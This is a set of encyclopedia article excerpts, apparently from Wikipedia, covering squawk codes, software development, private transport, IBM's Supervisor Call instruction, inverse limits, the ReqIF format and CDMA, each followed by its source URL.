Not all ATC units will use radar to identify aircraft, but they assign squawk codes nevertheless. As an example, London Information—the flight information service station that covers the southern half of the UK—does not have access to radar images, but does assign squawk code 1177 to all aircraft that receive aflight information service(FIS) from them. This tells other radar-equipped ATC units that a specific aircraft is listening on the London Information radio frequency, in case they need to contact that aircraft.[13]
The following codes are applicable worldwide.
SeeList of transponder codesfor list of country-specific and historic allocations.
|
https://en.wikipedia.org/wiki/Squawk_code
|
Software developmentis the process ofdesigningandimplementingasoftwaresolution tosatisfyauser. The process is more encompassing thanprogramming, writingcode, in that it includes conceiving the goal, evaluating feasibility, analyzingrequirements,design,testingandrelease. The process is part ofsoftware engineeringwhich also includesorganizational management,project management,configuration managementand other aspects.[1]
Software development involves many skills and job specializations includingprogramming,testing,documentation,graphic design,user support,marketing, andfundraising.
Software development involves manytoolsincluding:compiler,integrated development environment(IDE),version control,computer-aided software engineering, andword processor.
The details of the process used for a development effort varies. The process may be confined to a formal, documentedstandard, or it can be customized andemergentfor the development effort. The process may be sequential, in which each major phase (i.e. design, implement and test) is completed before the next begins, but an iterative approach – where small aspects are separately designed, implemented and tested – can reduce risk and cost and increase quality.
Each of the available methodologies are best suited to specific kinds of projects, based on various technical, organizational, project, and team considerations.[3]
Another focus in many programming methodologies is the idea of trying to catch issues such assecurity vulnerabilitiesandbugsas early as possible (shift-left testing) to reduce the cost of tracking and fixing them.[13]
In 2009, it was estimated that 32 percent of software projects were delivered on time and budget, and with the full functionality. An additional 44 percent were delivered, but missing at least one of these features. The remaining 24 percent were cancelled prior to release.[14]
Software development life cyclerefers to the systematic process of developingapplications.[15]
The sources of ideas for software products are plentiful. These ideas can come frommarket researchincluding thedemographicsof potential new customers, existing customers, sales prospects who rejected the product, other internal software development staff, or a creative third party. Ideas for software products are usually first evaluated bymarketingpersonnel for economic feasibility, fit with existing channels of distribution, possible effects on existing product lines, requiredfeatures, and fit with the company's marketing objectives. In the marketing evaluation phase, the cost and time assumptions become evaluated.[16]The feasibility analysis estimates the project'sreturn on investment, its development cost and timeframe. Based on this analysis, the company can make a business decision to invest in further development.[17]After deciding to develop the software, the company is focused on delivering the product at or below the estimated cost and time, and with a high standard of quality (i.e., lack of bugs) and the desired functionality. Nevertheless, most software projects run late and sometimes compromises are made in features or quality to meet a deadline.[18]
Software analysis begins with arequirements analysisto capture the business needs of the software.[19]Challenges for the identification of needs are that current or potential users may have different and incompatible needs, may not understand their own needs, and change their needs during the process of software development.[20]Ultimately, the result of analysis is a detailed specification for the product that developers can work from. Software analysts oftendecomposethe project into smaller objects, components that can be reused for increased cost-effectiveness, efficiency, and reliability.[19]Decomposing the project may enable amulti-threadedimplementation that runs significantly faster onmultiprocessorcomputers.[21]
During the analysis and design phases of software development,structured analysisis often used to break down the customer's requirements into pieces that can be implemented by software programmers.[22]The underlying logic of the program may be represented indata-flow diagrams,data dictionaries,pseudocode,state transition diagrams, and/orentity relationship diagrams.[23]If the project incorporates a piece oflegacy softwarethat has not been modeled, this software may be modeled to help ensure it is correctly incorporated with the newer software.[24]
Design involves choices about the implementation of the software, such as whichprogramming languagesand database software to use, or how the hardware and network communications will be organized. Design may be iterative with users consulted about their needs in a process oftrial and error. Design often involves people expert in aspect such asdatabase design, screen architecture, and the performance of servers and other hardware.[19]Designers often attempt to findpatternsin the software's functionality to spin off distinct modules that can be reused withobject-oriented programming. An example of this is themodel–view–controller, an interface between agraphical user interfaceand thebackend.[25]
The central feature of software development is creating and understanding the software that implements the desired functionality.[26]There are various strategies for writing the code. Cohesive software has various components that are independent from each other.[19]Coupling is the interrelation of different software components, which is viewed as undesirable because it increases the difficulty ofmaintenance.[27]Often, software programmers do not follow industry best practices, resulting in code that is inefficient, difficult to understand, or lackingdocumentationon its functionality.[28]These standards are especially likely to break down in the presence of deadlines.[29]As a result, testing, debugging, and revising the code becomes much more difficult.Code refactoring, for example adding more comments to the code, is a solution to improve the understandability of code.[30]
Testing is the process of ensuring that the code executes correctly and without errors.Debuggingis performed by each software developer on their own code to confirm that the code does what it is intended to. In particular, it is crucial that the software executes on all inputs, even if the result is incorrect.[31]Code reviewsby other developers are often used to scrutinize new code added to the project, and according to some estimates dramatically reduce the number of bugs persisting after testing is complete.[32]Once the code has been submitted,quality assurance—a separate department of non-programmers for most large companies—test the accuracy of the entire software product.Acceptance testsderived from the original software requirements are a popular tool for this.[31]Quality testing also often includes stress and load checking (whether the software is robust to heavy levels of input or usage),integration testing(to ensure that the software is adequately integrated with other software), andcompatibility testing(measuring the software's performance across different operating systems or browsers).[31]When tests are written before the code, this is calledtest-driven development.[33]
Production is the phase in which software is deployed to the end user.[34]During production, the developer may create technical support resources for users[35][34]or a process for fixing bugs and errors that were not caught earlier. There might also be a return to earlier development phases if user needs changed or were misunderstood.[34]
Software development is performed bysoftware developers, usually working on a team. Efficient communications between team members is essential to success. This is more easily achieved if the team is small, used to working together, and located near each other.[36]Communications also help identify problems at an earlier state of development and avoid duplicated effort. Many development projects avoid the risk of losing essential knowledge held by only one employee by ensuring that multiple workers are familiar with each component.[37]Software development involves professionals from various fields, not just softwareprogrammersbut also product managers who set the strategy and roadmap for the product,[38]individuals specialized in testing, documentation writing,graphic design, user support,marketing, and fundraising. Although workers for proprietary software are paid, most contributors toopen-source softwareare volunteers.[39]Alternately, they may be paid by companies whosebusiness modeldoes not involve selling the software, but something else—such as services and modifications to open source software.[40]
Computer-aided software engineering(CASE) is tools for the partialautomationof software development.[41]CASE enables designers to sketch out the logic of a program, whether one to be written, or an already existing one to help integrate it with new code orreverse engineerit (for example, to change theprogramming language).[42]
Documentation comes in two forms that are usually kept separate—that intended for software developers, and that made available to the end user to help them use the software.[43][44]Most developer documentation is in the form ofcode commentsfor each file,class, andmethodthat cover theapplication programming interface(API)—how the piece of software can be accessed by another—and often implementation details.[45]This documentation is helpful for new developers to understand the project when they begin working on it.[46]In agile development, the documentation is often written at the same time as the code.[47]User documentation is more frequently written bytechnical writers.[48]
Accurate estimation is crucial at the feasibility stage and in delivering the product on time and within budget. The process of generating estimations is often delegated by theproject manager.[49]Because the effort estimation is directly related to the size of the complete application, it is strongly influenced by addition of features in the requirements—the more requirements, the higher the development cost. Aspects not related to functionality, such as the experience of the software developers and code reusability, are also essential to consider in estimation.[50]As of 2019[update], most of the tools for estimating the amount of time and resources for software development were designed for conventional applications and are not applicable toweb applicationsormobile applications.[51]
Anintegrated development environment(IDE) supports software development with enhanced features compared to a simpletext editor.[52]IDEs often include automatedcompiling,syntax highlightingof errors,[53]debugging assistance,[54]integration withversion control, and semi-automation of tests.[52]
Version control is a popular way of managing changes made to the software. Whenever a new version is checked in, the software saves abackupof all modified files. If multiple programmers are working on the software simultaneously, it manages the merging of their code changes. The software highlights cases where there is a conflict between two sets of changes and allows programmers to fix the conflict.[55]
Aview modelis a framework that provides theviewpointson thesystemand itsenvironment, to be used in thesoftware development process. It is a graphical representation of the underlying semantics of a view.
The purpose of viewpoints and views is to enable human engineers to comprehend verycomplex systemsand to organize the elements of the problem around domains ofexpertise. In theengineeringof physically intensive systems, viewpoints often correspond to capabilities and responsibilities within the engineering organization.[56]
Fitness functionsare automated and objective tests to ensure that the new developments don't deviate from the established constraints, checks and compliance controls.[57]
Intellectual propertycan be an issue when developers integrateopen-sourcecode or libraries into a proprietary product, because mostopen-source licensesused for software require that modifications be released under the same license. As an alternative, developers may choose a proprietary alternative or write their own software module.[58]
|
https://en.wikipedia.org/wiki/Collaborative_software_development_model
|
Private transport(as opposed to public transport) is the personal or individual use oftransportationwhich are not available for use by the general public, where in theory the user can decide freely on the time and route of transit ('choice rider' vs. 'captive rider'[1]), using vehicles such as: private car, company car, bicycle, dicycle, self-balancing scooter, motorcycle, scooter, aircraft, boat, snowmobile, carriage, horse, etc., or recreational equipment such as roller skates, inline skates, sailboat, sailplane, skateboard etc.
Private transport is in contrast topublic transport, and commercial non-public transport. While private transportation may be used alongside nearly all modes of public transportation,private railroad carsare rare (e.g.royal train), althoughheritage railwaysare not. Unlike many forms of public transportation, which may be government subsidized or operated byprivately ownedcommercial organizations for mass or generalpublicuse, the entire cost of private transportation is born directly or indirectly by the individual user(s). However some scholars argue that it is inaccurate to say that the costs are covered by individual user because big (and often dominant) part of cost of private transportation is the cost of infrastructure on which individual trips rely. They therefore work also with model of quasi-privatemobility.[2]
Private transportation includes both non-motorized methods of private transit (pedestrians, cyclists, skaters, etc.) and all forms of self-propelled transportvehicles.
Non-public passenger transport in vehicles owned by the driver or passenger or operated by the driver.
Self driven transport in vehicles not owned by either the passengers or driver.
Non-scheduled transit vehicles,taxicabsandrickshaws, which are rented or hired in the short-term on-demand withdriver, belong, even if the user can freely decide on the time and route of transit, to the special forms of 'public transport'.[citation needed]
Means of transport are fixed route and fixed schedule passenger services, for example, excursionriverboats, touristcable cars,resortski lifts.
Private transport is the dominant form of transportation in most of the world. In theUnited States, for example, 86.2% ofpassenger milesare bypassenger vehicles, motorcycles, andtrucks.[3]
Cyclingandwalking, above all, have been recognized as the mostsustainable transportsystems. In general, all muscle-driven mobility will have a similarenergy efficiencywhile at the same time being almost emission-free (apart from the CO2exhaled duringbreathing).
The negativeenvironmental impact of private transportcan be alleviated by choosing the optimalmodal sharefor a given environment and transport requirements.
|
https://en.wikipedia.org/wiki/Private_transport
|
ASupervisor Call instruction(SVC) is a hardwareinstructionused by theSystem/360family ofIBM mainframecomputers up to contemporaryzSeries, theAmdahl470V/5, 470V/6, 470V/7, 470V/8, 580, 5880, 5990M, and 5990A, and others; Univac90/60, 90/70 and 90/80, and possibly others; the Fujitsu M180 (UP)[1]and M200 (MP), and others; and is also used in theHerculesopen sourcemainframeemulation software. It causes an interrupt to request a service from theoperating system. The system routine providing the service is called anSVC routine. SVC is asystem call.
IBM mainframes in the System/360 and successor families operate in one of two states:problem stateorsupervisor stateand in one of sixteen storage access keys (0 to 15). Inproblem state, a large set of general purposenon-privilegedinstructions are available to a user program. Insupervisor state, system programs are additionally able to use a small set ofprivilegedinstructions which are generally intended for supervisory functions. These functions may affect other users, other processors, or the entire computer system. In storage key 0 a program is able to access all addressable[a]storage, otherwise it is limited to storage areas with a matching key.
A program is only allowed to access specific supervisory functions after thorough authorization checking by the operating system: DEBCHK (SVC 117), TESTAUTH (SVC 119), and possibly additional tests. Programs which fail any of these tests are ABENDed, that isabnormally terminatedand immediately cease processing. Some of these tests were not available in OS/360, but were added inOS/VS1,SVSorMVS/370, but all were available in MVS/370 or subsequent releases, and are still available to this day.
InOS/VS1,OS/VS2 (SVS),MVS/370and subsequent versions of the OS, the MODESET function (SVC 107) obviated the need for many user-written SVCs as this system SVC accommodated both changes in mode (problem state to supervisor state) and key (8-15 [ user ] to 0-7 [ system ] ) in a single operation, and many user-written SVCs were originally intended for simple mode and key changes, anyway, and subsequently the only special requirement was that the jobstep be APF authorized[b][c]and that the MODESET-invoking program be resident in a concatenation of libraries all of which were identified as authorized, and this secure approach was completely under the installation's control. This approach generally simplified user controls over authorization, although some simple changes to the application were thereby required. In general, user installations favored this approach, and the overall reliability of the system was significantly improved thereby.
Although mainframe applications are typicallysynchronousprocesses, the operating system itself is naturallyasynchronous, although the system also supports many processes which are naturallysynchronous. When an application requests a system service which is naturallyasynchronous, such as input/output processing, a mechanism for synchronizing the application and the operating system must be employed. This essential mechanism is through functions which are built into the operating system, or are specifically supported by it, including: WAIT (temporarily halt application processing until an external event has occurred); POST (indicate occurrence of an external event so application processing may continue); and SYNCH (change system processing mode—supervisor to user and system key to user key—while preserving system integrity, and synchronously perform a function on behalf of the application, after which supervisor processing may continue).
TheOS/360 SVCstable below indicates the conditions under which these synchronizing facilities may be employed.
SVC is a two byte instruction with thehexadecimaloperation code0A; the second byte of the instruction, theSVC number, indicates the specific request.[2]The SVC number can be any value from 0 to 255, with the particular SVC number being up to the implementer of the operating system, e.g. on IBM's MVS, SVC 3 is used to terminate a program, while on the UNIVAC VS/9 and Fujitsu BS2000 operating systems, SVC 9 was used for the same purpose.
When a program issues an SVC, an interrupt occurs. The PSW, an 8-byte (on the System 360 and S/370) or 16 byte (on the z/System), privileged register containing, among other things, the current address of the instruction to be executed, the privilege bit (1 if privileged), and storage key, is saved at a real[d]address. This is locations 32-39 on the 360 and 370; 320-335 on the z/System. The PSW is then loaded from a different real[d]address ; it is 96-103 on the 360 and 370, 448-463 on the z/system. Execution resumes at the address that was loaded into the PSW. Bits 24-31 of the saved PSW (real[d]address 35 on the 360 and 370, 323 on the z/System) contain the Supervisor call number.
SVC invokes a supervisory function—usually implemented as a "closed subroutine" of the system's SVCinterrupt handler. Information passed to and from the SVC routines is passed ingeneral purpose registersor in memory.
UnderOS/360 and successors, return from an SVC routine is, for type 2, 3 and 4 SVC routines, via an SVC 3 (EXIT) invocation, and for other SVC types by the privilegedLoad PSW(LPSW) instruction, and which is executed on behalf of the SVC routine by the control program'sdispatcheror SVC interrupt handler.
On non-IBM developed operating systems such asMUSIC/SPdeveloped byMcGill Universityin Montreal, Canada for IBM mainframes, and for non-IBM mainframes,VS/9, developed by Univac (from theTSOSoperating system for theRCA Spectra 70series computers) for theUNIVAC Series 90mainframe line, and the B800 operating system (also developed from the TSOS operating system) forFujitsu's mainframes, all use the LPSW instruction to exit from a Supervisor Call.
The choice on whether to have a supervisor call return to the calling program directly through an LPSW instruction or through some other means such as a subroutine return instruction or a supervisor call itself, is a matter of design. There is no obvious "right" way to do this; there can be reasons for both methods. Using an LPSW instruction to exit an SVC routine allows for faster execution, but means actual testing of the routine has to be done on a dedicated machine running the code as part of an actual operating system supervisor. If the code was written as an ordinary subroutine it can be tested in the same manner as any ordinary program and potentially deployed without having to modify it. It also would allow metrics to be measured, as to how long a supervisor call routine took to complete its task, allowing for analysis of routines that are excessively long in execution time (or, ones that are very fast).
In OS/360 and later incarnations of the OS, branch and link entry points are alternatives to SVC invocations for some supervisor mode routines. In MVS/SP V1R3 and later incarnations of the OS, Program Call (PC) entries have augmented SVCs for invocations of many supervisory functions by both authorized and unauthorized programs; and some functions may only be invoked by branch or PC entries, e.g.STARTIO. (This also has the advantage of preventing IBM operating systems from being run on non-IBM hardware.)
Different IBM operating systems have little compatibility in the specific codes used or in the supervisor services which may be invoked.VM/370 and z/VMsystems use the DIAG instruction in a similar manner, and leave SVC for the use by operating systems running in virtual machines. Most OS/360 SVCs have been maintained for "legacy" programs, but some SVCs have been "extended" over the passage of time.
In OS/360 and successor systems SVC numbers 0 through approximately 127 are defined by IBM, and 255 downwards are available for use by an installation's systems programming staff. z/OS changed this to SVC numbers 0 through approximately 200 for IBM, and 255 downwards for the installation, as additional system services, primarily in support of encryption/decryption, were being implemented by IBM using SVCs. SVC routines must have module names in a specific format beginning with IGC.
By system design, the term "disabled" means disabled for all interruptions except for machine check interruptions in pre-MVS/370 systems, and with the "local lock" being held, but not "disabled" for any interruptions in MVS/370 and all later systems. The former is physical disablement, the latter is logical disablement, as an address space's "local lock" has the same impact within its address space as physical disablement, but it has no impact on other address spaces.
OS/360 defined four types of SVC routines, called "Type 1" through "Type 4"; MVS/370 added an additional "Type 6", which is similar to "Type 1" except that the SVC routine is physically disabled. "Type 5" was neither defined nor implemented. The following information, part of a table for OS/360, augmented for MVS/370 and successor systems, gives an idea of the considerations involved in writing an SVC routine.
The size restrictions on types 3 and 4 SVC routines are necessary because they are loaded into designated "transient areas" (PLPA in post-MVT) when invoked.
OS/360 did not, in general, have any way of restricting the use of SVCs. Consequently, there were quite a number of unintentional system- and data-integrity exposures which were possible by employing certain sequences of SVCs and other instructions. It became common practice for curious users to attempt to discover these exposures, but some system programmers used these exposures rather than develop their own user-written SVCs.
Beginning with MVS/370, IBM considered it aproduct defectif a system design error would allow an application program to enter supervisor state without authorization. They mandated that all IBM SVCs be protected to close all system- and data-integrity exposures. They "guaranteed" to close such exposures as these were discovered. By Release 3.7 of MVS/370 in 1977 nearly every such exposure had indeed been identified and closed, at the cost of 100,000 Authorized Program Analysis Reports (APARs) and relatedProgram temporary fixes(PTFs). This was a remarkable achievement, as system "up time" was thereafter measured inyears, rather than indaysor even inhours.
|
https://en.wikipedia.org/wiki/Supervisor_Call_instruction
|
Inmathematics, theinverse limit(also called theprojective limit) is a construction that allows one to "glue together" several relatedobjects, the precise gluing process being specified bymorphismsbetween the objects. Thus, inverse limits can be defined in anycategoryalthough their existence depends on the category that is considered. They are a special case of the concept oflimitin category theory.
By working in thedual category, that is by reversing the arrows, an inverse limit becomes adirect limitorinductive limit, and alimitbecomes acolimit.
We start with the definition of aninverse system(or projective system) ofgroupsandhomomorphisms. Let(I,≤){\displaystyle (I,\leq )}be adirectedposet(not all authors requireIto be directed). Let (Ai)i∈Ibe afamilyof groups and suppose we have a family of homomorphismsfij:Aj→Ai{\displaystyle f_{ij}:A_{j}\to A_{i}}for alli≤j{\displaystyle i\leq j}(note the order) with the following properties:
Then the pair((Ai)i∈I,(fij)i≤j∈I){\displaystyle ((A_{i})_{i\in I},(f_{ij})_{i\leq j\in I})}is called an inverse system of groups and morphisms overI{\displaystyle I}, and the morphismsfij{\displaystyle f_{ij}}are called the transition morphisms of the system.
We define theinverse limitof the inverse system((Ai)i∈I,(fij)i≤j∈I){\displaystyle ((A_{i})_{i\in I},(f_{ij})_{i\leq j\in I})}as a particularsubgroupof thedirect productof theAi{\displaystyle A_{i}}'s:
The inverse limitA{\displaystyle A}comes equipped withnatural projectionsπi:A→Aiwhich pick out theith component of the direct product for eachi{\displaystyle i}inI{\displaystyle I}. The inverse limit and the natural projections satisfy auniversal propertydescribed in the next section.
This same construction may be carried out if theAi{\displaystyle A_{i}}'s aresets,[1]semigroups,[1]topological spaces,[1]rings,modules(over a fixed ring),algebras(over a fixed ring), etc., and thehomomorphismsare morphisms in the correspondingcategory. The inverse limit will also belong to that category.
The inverse limit can be defined abstractly in an arbitrarycategoryby means of auniversal property. Let(Xi,fij){\textstyle (X_{i},f_{ij})}be an inverse system of objects andmorphismsin a categoryC(same definition as above). Theinverse limitof this system is an objectXinCtogether with morphismsπi:X→Xi(calledprojections) satisfyingπi=fij{\displaystyle f_{ij}}∘πjfor alli≤j. The pair (X,πi) must be universal in the sense that for any other such pair (Y, ψi) there exists a unique morphismu:Y→Xsuch that the diagram
commutesfor alli≤j. The inverse limit is often denoted
with the inverse system(Xi,fij){\textstyle (X_{i},f_{ij})}and the canonical projectionsπi{\displaystyle \pi _{i}}being understood.
In some categories, the inverse limit of certain inverse systems does not exist. If it does, however, it is unique in a strong sense: given any two inverse limitsXandX'of an inverse system, there exists auniqueisomorphismX′ →Xcommuting with the projection maps.
Inverse systems and inverse limits in a categoryCadmit an alternative description in terms offunctors. Any partially ordered setIcan be considered as asmall categorywhere the morphisms consist of arrowsi→jif and only ifi≤j. An inverse system is then just acontravariant functorI→C. LetCIop{\displaystyle C^{I^{\mathrm {op} }}}be the category of these functors (withnatural transformationsas morphisms). An objectXofCcan be considered a trivial inverse system, where all objects are equal toXand all arrow are the identity ofX. This defines a "trivial functor" fromCtoCIop.{\displaystyle C^{I^{\mathrm {op} }}.}The inverse limit, if it exists, is defined as aright adjointof this trivial functor.
For anabelian categoryC, the inverse limit functor
isleft exact. IfIis ordered (not simply partially ordered) andcountable, andCis the categoryAbof abelian groups, the Mittag-Leffler condition is a condition on the transition morphismsfijthat ensures the exactness oflim←{\displaystyle \varprojlim }. Specifically,Eilenbergconstructed a functor
(pronounced "lim one") such that if (Ai,fij), (Bi,gij), and (Ci,hij) are three inverse systems of abelian groups, and
is ashort exact sequenceof inverse systems, then
is an exact sequence inAb.
If the ranges of the morphisms of an inverse system of abelian groups (Ai,fij) arestationary, that is, for everykthere existsj≥ksuch that for alli≥j:fkj(Aj)=fki(Ai){\displaystyle f_{kj}(A_{j})=f_{ki}(A_{i})}one says that the system satisfies theMittag-Leffler condition.
The name "Mittag-Leffler" for this condition was given by Bourbaki in their chapter on uniform structures for a similar result about inverse limits of complete Hausdorff uniform spaces. Mittag-Leffler used a similar argument in the proof ofMittag-Leffler's theorem.
The following situations are examples where the Mittag-Leffler condition is satisfied:
An example wherelim←1{\displaystyle \varprojlim {}^{1}}is non-zero is obtained by takingIto be the non-negativeintegers, lettingAi=piZ,Bi=Z, andCi=Bi/Ai=Z/piZ. Then
whereZpdenotes thep-adic integers.
More generally, ifCis an arbitrary abelian category that hasenough injectives, then so doesCI, and the rightderived functorsof the inverse limit functor can thus be defined. Thenth right derived functor is denoted
In the case whereCsatisfiesGrothendieck's axiom(AB4*),Jan-Erik Roosgeneralized the functor lim1onAbIto series of functors limnsuch that
It was thought for almost 40 years that Roos had proved (inSur les foncteurs dérivés de lim. Applications.) that lim1Ai= 0 for (Ai,fij) an inverse system with surjective transition morphisms andIthe set of non-negative integers (such inverse systems are often called "Mittag-Lefflersequences"). However, in 2002,Amnon NeemanandPierre Deligneconstructed an example of such a system in a category satisfying (AB4) (in addition to (AB4*)) with lim1Ai≠ 0. Roos has since shown (in "Derived functors of inverse limits revisited") that his result is correct ifChas a set of generators (in addition to satisfying (AB3) and (AB4*)).
Barry Mitchellhas shown (in "The cohomological dimension of a directed set") that ifIhascardinalityℵd{\displaystyle \aleph _{d}}(thedthinfinite cardinal), thenRnlim is zero for alln≥d+ 2. This applies to theI-indexed diagrams in the category ofR-modules, withRa commutative ring; it is not necessarily true in an arbitrary abelian category (see Roos' "Derived functors of inverse limits revisited" for examples of abelian categories in which limn, on diagrams indexed by a countable set, is nonzero forn> 1).
Thecategorical dualof an inverse limit is adirect limit(or inductive limit). More general concepts are thelimits and colimitsof category theory. The terminology is somewhat confusing: inverse limits are a class of limits, while direct limits are a class of colimits.
|
https://en.wikipedia.org/wiki/Inverse_limit
|
.reqif
RIF/ReqIF(Requirements Interchange Format) is anXMLfile format that can be used to exchange requirements, along with its associated metadata, between software tools from different vendors. The requirements exchange format also defines a workflow for transmitting the status of requirements between partners. Although developed in the automotive industry, ReqIF is suitable for lossless exchange of requirements in any industry.
In 2004, HIS (Herstellerinitiative Software) a consortium of German automotive manufacturers, defined a generic requirements interchange format called RIF.
The format was handed over in 2008 toProSTEP iViP e.V.for further maintenance. A project group responsible for international standardization further developed the format and handed over a revised version toObject Management Group(OMG) as "Request for Comment" in 2010.[1]
As the acronym RIF had an ambiguous meaning within the OMG, the new name ReqIF was introduced to separate it from theW3C'sRule Interchange Format.
In April 2011, the version 1.0.1 of ReqIF was adopted by OMG as a formal specification (OMG Document Number: formal/2011-04-02).
In October 2013, version 1.1 was published (OMG Document Number: formal/2013-10-01). Changes are restricted to the text of the standard, the XML schema and underlying model have not changed. Therefore, 1.1 and 1.0.1 .reqif files are equivalent.
In July 2016, version 1.2 was published (OMG Document Number: formal/2016-07-01). As with the previous versions, changes are restricted to the text of the standard, the XML schema and underlying model have not changed. Therefore, 1.2, 1.1 and 1.0.1 .reqif files are equivalent.
ReqIF is an exchange file format for exchanging requirements, attributes, additional files (e.g. images) across a chain of manufacturers, suppliers, sub-suppliers and the like. AGUIDensures unique identification of content across the process chain.
Requirements are typically elicited during the early phase of product development. This is the primary application of ReqIF, as development across organizations is happening more and more often. ReqIF allows for sharing of requirements between partners, even if different tools are used. In contrast to formats like Word, Excel or PDF, ReqIF allows for a loss-free exchange.
ReqIF was pioneered by automotive manufacturers, who started to demand the use of ReqIF in particular for the development of embedded controllers.
ReqIF is also used as the underlying data model for tool implementations. This is particularly true for the ReqIFReference implementation(Eclipse RMF), which is being used by an implementer forum,[2]that aims to ensure interoperability of various ReqIF implementations. ReqIF Server[3]is another tool that natively uses ReqIF.
RIF/ReqIF is a standardized meta-model, defined by an XML schema. Such files must conform to the schema and contain the description of the model (the datatypes), as well as the data. A successful data exchange between various tools only succeeds, if all parties agree on acommon data model. The previously mentioned implementor forum is working on such a common model and also organizes tests with tools of the participating manufacturers, to ensure future interoperability.
An OMG ReqIF file consists of XML with the root elementREQ-IF, containing information regarding the file itself as well as the contained datatypes and requirements.
The containers for requirements in ReqIF are called specification objects (SpecObject), which have user-defined attributes. Each attribute has a data type, which is one ofBoolean,Integer,Real,String,Enumeration(with user-defined values) and XHTML, which is also for formatted text and embedded objects, including images. Some datatypes can be constrained further, e.g. the range of numerical values.
Relationships between objects are represented asSpecRelations, which can also have attributes.
At last, hierarchical trees create a structured view on SpecObjects, calledSpecifications. Multiple references on the same SpecObject are permitted.
The structure of ReqIF is described in detail in the specification.[4]There is also a free one-page reference of the data model available[5]
|
https://en.wikipedia.org/wiki/Requirements_Interchange_Format
|
Code-division multiple access(CDMA) is achannel access methodused by variousradiocommunication technologies. CDMA is an example ofmultiple access, where several transmitters can send information simultaneously over a single communication channel. This allows several users to share a band of frequencies (seebandwidth). To permit this without undue interference between the users, CDMA employsspread spectrumtechnology and a special coding scheme (where each transmitter is assigned a code).[1][2]
CDMA optimizes the use of available bandwidth as it transmits over the entire frequency range and does not limit the user's frequency range.
It is used as the access method in manymobile phone standards.IS-95, also called "cdmaOne", and its3GevolutionCDMA2000, are often simply referred to as "CDMA", butUMTS, the 3G standard used byGSMcarriers, also uses "wideband CDMA", or W-CDMA, as well as TD-CDMA and TD-SCDMA, as its radio technologies. Many carriers (such asAT&T,UScellularandVerizon) shut down 3G CDMA-based networks in 2022 and 2024, rendering handsets supporting only those protocols unusable for calls, even to911.[3][4]
It can be also used as a channel or medium access technology, likeALOHAfor example or as a permanent pilot/signalling channel to allow users to synchronize their local oscillators to a common system frequency, thereby also estimating the channel parameters permanently.
In these schemes, the message is modulated on a longer spreading sequence, consisting of several chips (0es and 1es). Due to their very advantageous auto- and crosscorrelation characteristics, these spreading sequences have also been used for radar applications for many decades, where they are calledBarker codes(with a very short sequence length of typically 8 to 32).
For space-based communication applications, CDMA has been used for many decades due to the large path loss and Doppler shift caused by satellite motion. CDMA is often used withbinary phase-shift keying(BPSK) in its simplest form, but can be combined with any modulation scheme like (in advanced cases)quadrature amplitude modulation(QAM) ororthogonal frequency-division multiplexing(OFDM), which typically makes it very robust and efficient (and equipping them with accurate ranging capabilities, which is difficult without CDMA). Other schemes use subcarriers based onbinary offset carrier modulation(BOC modulation), which is inspired byManchester codesand enable a larger gap between the virtual center frequency and the subcarriers, which is not the case for OFDM subcarriers.
The technology of code-division multiple access channels has long been known.
In the US, one of the earliest descriptions of CDMA can be found in the summary report of Project Hartwell on "The Security of Overseas Transport", which was a summer research project carried out at theMassachusetts Institute of Technologyfrom June to August 1950.[5]Further research in the context ofjammingandanti-jammingwas carried out in 1952 atLincoln Lab.[6]
In theSoviet Union(USSR), the first work devoted to this subject was published in 1935 byDmitry Ageev.[7]It was shown that through the use of linear methods, there are three types of signal separation: frequency, time and compensatory.[clarification needed]The technology of CDMA was used in 1957, when the young military radio engineerLeonid Kupriyanovichin Moscow made an experimental model of a wearable automatic mobile phone, called LK-1 by him, with a base station.[8]LK-1 has a weight of 3 kg, 20–30 km operating distance, and 20–30 hours of battery life.[9][10]The base station, as described by the author, could serve several customers. In 1958, Kupriyanovich made the new experimental "pocket" model of mobile phone. This phone weighed 0.5 kg. To serve more customers, Kupriyanovich proposed the device, which he called "correlator."[11][12]In 1958, the USSR also started the development of the "Altai" national civil mobile phone service for cars, based on the Soviet MRT-1327 standard. The phone system weighed 11 kg (24 lb). It was placed in the trunk of the vehicles of high-ranking officials and used a standard handset in the passenger compartment. The main developers of the Altai system were VNIIS (Voronezh Science Research Institute of Communications) and GSPI (State Specialized Project Institute). In 1963 this service started in Moscow, and in 1970 Altai service was used in 30 USSR cities.[13]
CDMA is a spread-spectrum multiple-access technique. A spread-spectrum technique spreads the bandwidth of the data uniformly for the same transmitted power. A spreading code is apseudo-random codein the time domain that has a narrowambiguity functionin the frequency domain, unlike other narrow pulse codes. In CDMA a locally generated code runs at a much higher rate than the data to be transmitted. Data for transmission is combined by bitwiseXOR(exclusive OR) with the faster code. The figure shows how a spread-spectrum signal is generated. The data signal with pulse duration ofTb{\displaystyle T_{b}}(symbol period) is XORed with the code signal with pulse duration ofTc{\displaystyle T_{c}}(chip period). (Note:bandwidthis proportional to1/T{\displaystyle 1/T}, whereT{\displaystyle T}= bit time.) Therefore, the bandwidth of the data signal is1/Tb{\displaystyle 1/T_{b}}and the bandwidth of the spread spectrum signal is1/Tc{\displaystyle 1/T_{c}}. SinceTc{\displaystyle T_{c}}is much smaller thanTb{\displaystyle T_{b}}, the bandwidth of the spread-spectrum signal is much larger than the bandwidth of the original signal. The ratioTb/Tc{\displaystyle T_{b}/T_{c}}is called the spreading factor or processing gain and determines to a certain extent the upper limit of the total number of users supported simultaneously by a base station.[1][2]
Each user in a CDMA system uses a different code to modulate their signal. Choosing the codes used to modulate the signal is very important in the performance of CDMA systems. The best performance occurs when there is good separation between the signal of a desired user and the signals of other users. The separation of the signals is made bycorrelatingthe received signal with the locally generated code of the desired user. If the signal matches the desired user's code, then the correlation function will be high and the system can extract that signal. If the desired user's code has nothing in common with the signal, the correlation should be as close to zero as possible (thus eliminating the signal); this is referred to ascross-correlation. If the code is correlated with the signal at any time offset other than zero, the correlation should be as close to zero as possible. This is referred to as auto-correlation and is used to reject multi-path interference.[18][19]
An analogy to the problem of multiple access is a room (channel) in which people wish to talk to each other simultaneously. To avoid confusion, people could take turns speaking (time division), speak at different pitches (frequency division), or speak in different languages (code division). CDMA is analogous to the last example where people speaking the same language can understand each other, but other languages are perceived asnoiseand rejected. Similarly, in radio CDMA, each group of users is given a shared code. Many codes occupy the same channel, but only users associated with a particular code can communicate.
In general, CDMA belongs to two basic categories: synchronous (orthogonal codes) and asynchronous (pseudorandom codes).
